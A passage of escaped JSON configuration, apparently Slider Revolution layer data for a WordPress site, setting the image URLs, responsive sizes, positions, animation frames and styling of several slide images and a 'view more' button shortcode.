1\",\"alias\":\"Mermer\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide3-graphic1.jpg\",\"imageId\":3275},\"size\":{\"width\":{\"d\":{\"v\":\"1920px\",\"e\":true},\"n\":{\"v\":\"1556px\",\"e\":true},\"t\":{\"v\":\"1556px\"},\"m\":{\"v\":\"1556px\"}},\"height\":{\"d\":{\"v\":\"393px\",\"e\":true},\"n\":{\"v\":\"318px\",\"e\":true},\"t\":{\"v\":\"318px\"},\"m\":{\"v\":\"318px\"}},\"originalWidth\":1920,\"originalHeight\":393,\"aspectRatio\":{\"d\":{\"v\":4.885496183206107},\"n\":{\"v\":4.885496183206107},\"t\":{\"v\":4.885496183206107},\"m\":{\"v\":4.885496183206107}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-10px\",\"e\":true},\"t\":{\"v\":\"-12px\",\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-107px\",\"e\":true},\"n\":{\"v\":\"-207px\",\"e\":true},\"t\":{\"v\":\"-64px\",\"e\":true},\"m\":{\"v\":\"-146px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Bell\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide3-graphic2-1.png\",\"imageId\":3280},\"size\":{\"width\":{\"d\":{\"v\":\"277px\",\"e\":true},\"n\":{\"v\":\"187px\",\"e\":true},\"t\":{\"v\":\"187px\",\"e\":true},\"m\":{\"v\":\"121px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"450px\",\"e\":true},\"n\":{\"v\":\"304px\",\"e\":true},\"t\":{\"v\":\"304px\",\"e\":true},\"m\":{\"v\":\"197px\",\"e\":true}},\"originalWidth\":277,\"originalHeight\":450,\"aspectRatio\":{\"d\":{\"v\":0.6155555555555555},\"n\":{\"v\":0.6155555555555555},\"t\":{\"v\":0.6155555555555555},\"m\":{\"v\":0.6155555555555555}}},\"position\":{\"x\":{\"d\":{\"v\":\"185px\",\"e\":true},\"n\":{\"v\":\"140px\",\"e\":true},\"t\":{\"v\":\"-127px\",\"e\":true},\"m\":{\"v\":\"225px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"75px\",\"e\":true},\"n\":{\"v\":\"110px\",\"e\":true},\"t\":{\"v\":\"140px\",\"e\":true},\"m\":{\"v\":\"133px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":740},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1170,\"start\":740,\"startRelative\":740},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1170,\"start\":740,\"startRelative\":740},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":0,\"start\":3000,\"startRelative\":1090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Box\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide3-graphic-4.png\",\"imageId\":4249},\"size\":{\"width\":{\"d\":{\"v\":\"798px\",\"e\":true},\"n\":{\"v\":\"632px\",\"e\":true},\"t\":{\"v\":\"632px\",\"e\":true},\"m\":{\"v\":\"448px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"506px\",\"e\":true},\"n\":{\"v\":\"401px\",\"e\":true},\"t\":{\"v\":\"401px\",\"e\":true},\"m\":{\"v\":\"284px\",\"e\":true}},\"originalWidth\":798,\"originalHeight\":506,\"aspectRatio\":{\"d\":{\"v\":1.5770750988142292},\"n\":{\"v\":1.5770750988142292},\"t\":{\"v\":1.5770750988142292},\"m\":{\"v\":1.5770750988142292}}},\"position\":{\"x\":{\"d\":{\"v\":\"633px\",\"e\":true},\"n\":{\"v\":\"460px\",\"e\":true},\"t\":{\"v\":\"232px\",\"e\":true},\"m\":{\"v\":\"-177px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"102px\",\"e\":true},\"n\":{\"v\":\"110px\",\"e\":true},\"t\":{\"v\":\"145px\",\"e\":true},\"m\":{\"v\":\"89px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":940},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1170,\"start\":940,\"startRelative\":940},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1170,\"start\":940,\"startRelative\":940},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":0,\"start\":3000,\"startRelative\":890,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"Biljka\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide3-graphic-3.png\",\"imageId\":3278},\"size\":{\"width\":{\"d\":{\"v\":\"663px\",\"e\":true},\"n\":{\"v\":\"428px\",\"e\":true},\"t\":{\"v\":\"428px\"},\"m\":{\"v\":\"272px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"748px\",\"e\":true},\"n\":{\"v\":\"482px\",\"e\":true},\"t\":{\"v\":\"482px\"},\"m\":{\"v\":\"306px\",\"e\":true}},\"originalWidth\":663,\"originalHeight\":748,\"aspectRatio\":{\"d\":{\"v\":0.8863636363636364},\"n\":{\"v\":0.8863636363636364},\"t\":{\"v\":0.8863636363636364},\"m\":{\"v\":0.8863636363636364}}},\"position\":{\"x\":{\"d\":{\"v\":\"692px\",\"e\":true},\"n\":{\"v\":\"500px\",\"e\":true},\"t\":{\"v\":\"257px\",\"e\":true},\"m\":{\"v\":\"-120px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-36px\",\"e\":true},\"n\":{\"v\":\"50px\",\"e\":true},\"t\":{\"v\":\"94px\",\"e\":true},\"m\":{\"v\":\"107px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":1040},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1170,\"start\":1040,\"startRelative\":1040},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1170,\"start\":1040,\"startRelative\":1040},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":0,\"start\":3000,\"startRelative\":790,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"Button\",\"uid\":11,\"size\":{\"width\":{\"d\":{\"v\":\"506px\",\"e\":true},\"n\":{\"v\":\"506px\",\"e\":true},\"t\":{\"v\":\"506px\",\"e\":true},\"m\":{\"v\":\"506px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"506px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-367px\",\"e\":true},\"n\":{\"v\":\"-243px\",\"e\":true},\"t\":{\"v\":\"-42px\",\"e\":true},\"m\":{\"v\":\"166px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"114px\",\"e\":true},\"n\":{\"v\":\"152px\",\"e\":true},\"t\":{\"v\":\"281px\",\"e\":true},\"m\":{\"v\":\"147px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 